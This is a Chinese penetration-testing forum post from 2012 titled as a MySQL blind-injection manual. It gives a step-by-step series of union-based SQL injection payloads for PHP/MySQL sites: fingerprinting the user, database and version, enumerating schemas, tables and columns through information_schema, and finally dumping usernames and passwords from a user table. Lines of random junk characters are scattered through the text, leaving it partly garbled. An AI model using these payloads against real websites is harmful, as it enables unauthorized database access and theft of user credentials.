中国网络渗透测试联盟
标题:
mysql盲注手册
[打印本页]
作者:
admin
时间:
2012-9-13 16:27
标题:
mysql盲注手册
" I2 ?- D$ ~3 r$ Y" l
教程内容:Mysql 5+php 注入
5 b5 b( w: X" c
: Y/ I/ Z3 T* ?# l/ ?% `; Q. O( @
, [" r$ Q8 d( w# G5 `
6 E6 R! [+ z( @
一.查看MYSQL基本信息(库名,版本,用户)
+ E$ X1 I# s, B) ~" r
! D8 G5 E8 ^; T
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
# N8 ]3 }/ j5 y( }
* @; ]9 p! j- {, p& M, w4 g2 M0 E
二.查数据库
% q" y; w" {0 k) a) A, r; E1 p
E: I6 L1 M3 ^ i" D+ [+ T0 M- ]
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
6 V4 I8 u7 O z1 C4 h- J3 l
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
( S- j# N! o; ^. {
6 D8 F3 p% z r& f4 [8 e" E$ B
三.暴表
8 m( I6 N1 s8 a+ D$ F
% S. r. A0 |" [3 T6 T9 K
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
& Q9 t7 _' Q1 x& x
: ~3 v6 `& q% I( l0 r
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
, W/ a4 {9 \( J
1 D d* Y) l4 S# ]) R
四.暴字段
8 v) ]) O# C7 K& L) _. C" M, B
5 i+ z7 s9 e) J2 _$ l; p
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
7 `2 [8 R# J& X0 J3 o' E
- |7 S( Z m% f0 j4 r
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
; k7 y# e- j: r# {: ]9 Q
' J+ P+ h. {) m% }" ?) M& p! h
五.暴数据
1 i7 @- ]) @( ~ _
5 s/ U7 i5 X( I3 K) ?( ~) z
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
|) K" v) Y- {
; a! s! U- @6 k2 {
& E5 N" V# }; t7 T' a" c a- i
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
3 D6 Z) O0 Z& R! ]) }& N. B
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2